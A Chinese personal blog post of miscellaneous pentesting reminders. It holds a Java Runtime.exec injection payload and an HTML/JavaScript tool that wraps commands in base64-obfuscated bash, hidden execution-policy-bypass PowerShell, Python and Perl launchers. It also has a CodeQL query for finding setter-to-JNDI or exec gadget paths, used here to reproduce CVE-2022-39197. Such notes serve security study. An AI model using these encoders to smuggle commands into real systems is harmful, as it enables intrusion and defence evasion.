抱歉,您的浏览器无法访问本站
本页面需要浏览器支持(启用)JavaScript
了解详情 >

一些杂七杂八提醒自己的东西

杂七杂八

发布于:2022年10月20日

次浏览

反弹shell

@java.lang.Runtime@getRuntime().exec(‘id’)

base64编码工具

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
<!DOCTYPE html>
<html>
    <head>
        <title>java runtime exec usage...</title>
    </head>
    <body>
        <p>Input type:
        <input type="radio" id="bash" name="option" value="bash" onclick="processInput();" checked=""><label for="bash">Bash</label>
        <input type="radio" id="powershell" name="option" value="powershell" onclick="processInput();"><label for="powershell">PowerShell</label>
        <input type="radio" id="python" name="option" value="python" onclick="processInput();"><label for="python">Python</label>
        <input type="radio" id="perl" name="option" value="perl" onclick="processInput();"><label for="perl">Perl</label></p>

        <p><textarea rows="10" style="width: 100%; box-sizing: border-box;" id="input" placeholder="Type Bash here..."></textarea>
        <textarea rows="5" style="width: 100%; box-sizing: border-box;" id="output" onclick="this.focus(); this.select();" readonly=""></textarea></p>

        <script>
            var taInput = document.querySelector('textarea#input');
            var taOutput = document.querySelector('textarea#output');

            function processInput() {
                var option = document.querySelector('input[name="option"]:checked').value;

                switch (option) {
                    case 'bash':
                        taInput.placeholder = 'Type Bash here...'
                        taOutput.value = 'bash -c {echo,' + btoa(taInput.value) + '}|{base64,-d}|{bash,-i}';
                        break;
                    case 'powershell':
                        taInput.placeholder = 'Type PowerShell here...'
                        poshInput = ''
                        for (var i = 0; i < taInput.value.length; i++) { poshInput += taInput.value[i] + unescape("%00"); }
                        taOutput.value = 'powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc ' + btoa(poshInput);
                        break;
                    case 'python':
                        taInput.placeholder = 'Type Python here...'
                        taOutput.value = "python -c exec('" + btoa(taInput.value) + "'.decode('base64'))";
                        break;
                    case 'perl':
                        taInput.placeholder = 'Type Perl here...'
                        taOutput.value = "perl -MMIME::Base64 -e eval(decode_base64('" + btoa(taInput.value) + "'))";
                        break;
                    default:
                        taOutput.value = ''
                }

                if (!taInput.value) taOutput.value = '';
            }

            taInput.addEventListener('input', processInput, false);
        </script>
    </body>
</html>

Shell、命令等,上传到java的时候,base64编码一下

web攻击

一些注入攻击,bp该包等攻击,注意url编码一下

代码审计的时候,可以用codeQL,用来查找漏洞函数

代码审计的时候,因为代码太多了,函数也太多了,就可以用codeQL来找一些符合条件的函数。

应用场景:你需要找一个函数,他传入的参数是String类型,而且返回的值也是String类型,还有就是函数名字是setXxx这样的

cs rce CVE-2022-39197 漏洞复现

CS_XSS.ql

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
/**
 * @kind path-problem
 */
import java
//查找source的类到恶意类的通路
//source有xxx属性、有setXXX方法且有一个String参数、instanceof Component

class XXXSetMethod extends Method{
  XXXSetMethod(){
      this.getName().indexOf("set") = 0 and
      this.getName().length() > 3 and
      this.getNumberOfParameters() = 1 and
      this.getAParamType().hasName("String") and
      this.getDeclaringType().getASupertype*().hasQualifiedName("java.awt", "Component")
  }
}

class JNDIMethod extends Method{
  JNDIMethod(){
      this.getDeclaringType().getAnAncestor().hasQualifiedName("javax.naming", "Context") and
      this.hasName("lookup")
  }
}
class InvokeMethod extends Method {
  InvokeMethod() {
    this.hasName("invoke")
  }
}

class NewInstanceMethod extends Method {
  NewInstanceMethod() {
      exists(RefType type, Method m|
          this.getACallee() = m and 
          m.hasName("newInstance") and 
          m.getDeclaringType*().getErasure() = type
      )
  }
}
class CommandInjectMethod extends Method {
  CommandInjectMethod() {
      this.getACallee() instanceof ExecCallable
  }
}
class RuntimeMethod extends Method {
  RuntimeMethod() {
    this.getDeclaringType().hasQualifiedName("java.lang", "Runtime") and
    this.hasName("exec")
  }
}

class TargetMethod extends Method {
    TargetMethod() {
      this instanceof JNDIMethod or
      // this instanceof InvokeMethod or
      // this instanceof NewInstanceMethod or
      this instanceof CommandInjectMethod or
      this instanceof MethodRuntimeExec or
      this instanceof MethodProcessBuilderCommand
    }
}


query predicate edges(Method a, Method b) { a.polyCalls(b) }

from XXXSetMethod entryPoint, TargetMethod end
where edges*(entryPoint, end)
select entryPoint, entryPoint, end, "Found a path from start to target."

更新于:2024年8月27日

评论